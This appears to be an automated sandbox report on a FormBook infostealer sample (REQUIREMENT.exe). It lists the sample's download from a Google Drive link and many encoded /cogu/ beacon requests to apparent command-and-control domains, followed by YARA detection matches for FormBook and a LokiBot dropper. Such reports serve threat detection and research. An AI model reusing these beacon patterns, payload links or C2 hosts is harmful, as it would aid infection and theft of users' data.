Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1Host: www.hkautobox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1Host: www.taichan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1Host: www.bestofnapa.guideConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1Host: www.bqgfk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1Host: www.mobileiranian2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1Host: www.soymilk-design.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1Host: www.jkwhitleyphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.boliden-ab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1Host: www.jachaljuega.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1Host: www.ceruleden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1Host: www.marvellouslles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1Host: www.nu12.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1Host: www.cinargeridonusum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.uprisehealthmonitoring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.estudio-me.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.i8news-de.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.alexanderorlandis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.78:443 -> 192.168.11.20:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49832 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Source: REQUIREMENT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
